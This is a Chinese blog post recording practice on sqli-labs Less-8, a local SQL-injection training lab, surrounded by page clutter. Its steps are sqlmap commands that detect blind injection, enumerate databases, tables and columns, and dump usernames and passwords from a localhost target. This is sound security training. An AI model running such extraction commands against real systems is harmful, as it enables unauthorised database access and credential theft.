sqli-labs靶场Page1(Basic Challenges)练习记录8

已于 2022-11-14 11:31:21 修改
阅读量471 收藏
点赞数
分类专栏: 渗透测试学习笔记 文章标签: 网络安全
于 2022-11-14 11:29:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49015143/article/details/127843694
版权

1.初始状态:

 2.检测目标是否有SQL注入漏洞:

python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-8/?id=1

 存在布尔盲注和时间盲注

3.获取当前用户:

python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-8/?id=1 --current-user

 4.获取数据库:

当前:

python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-8/?id=1 --current-db

所有:

python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-8/?id=1 --dbs

 5.获取当前数据库表名:

python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-8/?id=1 -D security --tables

 6.获取users表列名:

python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-8/?id=1 -D security -T users --columns

 7.获取用户名及密码:

python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-8/?id=1 -D security -T users -C username,password --dump

风不归Alkaid
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
SQLi-LABS Page-1(Basic Challenges)1-22
SQLi-LABS Page-1(Basic Challenges)
07-24
SQLi-LABS Page-1(Basic Challenges) 1-22关 附带多种方法
SQLi-LABS Page-1(Basic Challenges)1-22关
05-18
SQLi-LABS Page-1(Basic Challenges)1-22关
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8241
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
grpcio-1.63.0-cp38-cp38-linux_armv7l.whl
05-28
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
SQLyog-13.1.3-0.x86Community.exe
05-28
SQLyog-13.1.3-0.x86Community
VB自动出题题库系统设计(源代码+系统).rar
05-28
计算机专业毕业设计VB精品论文资源
debugpy-1.0.0b2-cp35-cp35m-manylinux1_i686.whl
05-28
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
实战自学python如何成为大佬(目录):https://blog.csdn.net/weixin-67859959/artic
05-28
实战自学python如何成为大佬(目录):https://blog.csdn.net/weixin-67859959/artic
HTML5小游戏【狂抽男朋友耳光】游戏源码分享下载 - games.zip
05-28
HTML5小游戏【狂抽男朋友耳光】游戏源码分享下载 --- games.zipHTML5小游戏【狂抽男朋友耳光】游戏源码分享下载 --- games.zipHTML5小游戏【狂抽男朋友耳光】游戏源码分享下载 --- games.zipHTML5小游戏【狂抽男朋友耳光】游戏源码分享下载 --- games.zipHTML5小游戏【狂抽男朋友耳光】游戏源码分享下载 --- games.zipHTML5小游戏【狂抽男朋友耳光】游戏源码分享下载 --- games.zipHTML5小游戏【狂抽男朋友耳光】游戏源码分享下载 --- games.zipHTML5小游戏【狂抽男朋友耳光】游戏源码分享下载 --- games.zipHTML5小游戏【狂抽男朋友耳光】游戏源码分享下载 --- games.zipHTML5小游戏【狂抽男朋友耳光】游戏源码分享下载 --- games.zipHTML5小游戏【狂抽男朋友耳光】游戏源码分享下载 --- games.zipHTML5小游戏【狂抽男朋友耳光】游戏源码分享下载 --- games.zipHTML5小游戏【狂抽男朋友耳光】游戏源码分享下载 --- ga
个人用电量和天气,该数据集包括中国北方某城市一个家庭的用电量
05-28
该数据集包括中国北方某城市一个家庭的用电量。 时间段为2018年11月1日至2021年11月1日。
源代码-ExcelToAccess批量导入数据 v1.0.zip
05-28
源代码-ExcelToAccess批量导入数据 v1.0.zip
基于python开发的生产从shp到pbf格式的矢量地图切片+源码(期末大作业)
05-28
基于python开发的生产从shp到pbf格式的矢量地图切片+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 基于python开发的生产从shp到pbf格式的矢量地图切片+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 基于python开发的生产从shp到pbf格式的矢量地图切片+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 基于python开发的生产从shp到pbf格式的矢量地图切片+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 基于python开发的生产从shp到pbf格式的矢量地图切片+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~
grpcio-1.46.3-cp39-cp39-musllinux_1_1_i686.whl
05-28
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
h5py-2.6.0-cp36-cp36m-manylinux1_x86_64.whl
最新发布
05-28
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
grpcio-1.57.0-cp310-cp310-manylinux_2_17_aarch64.whl
05-28
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
搜索链接java(结合lucene)版的公交搜索系统-javaso
05-28
[搜索链接]java(结合lucene)版的公交搜索系统_javaso
ubuntu搭建sqli-labs靶场
10-15
好的,以下是搭建sqli-labs靶场的步骤: 1. 安装LAMP环境(Linux + Apache + MySQL + PHP): ``` sudo apt-get update sudo apt-get install apache2 mysql-server php libapache2-mod-php php-mysql ``` 2. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

风不归Alkaid

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值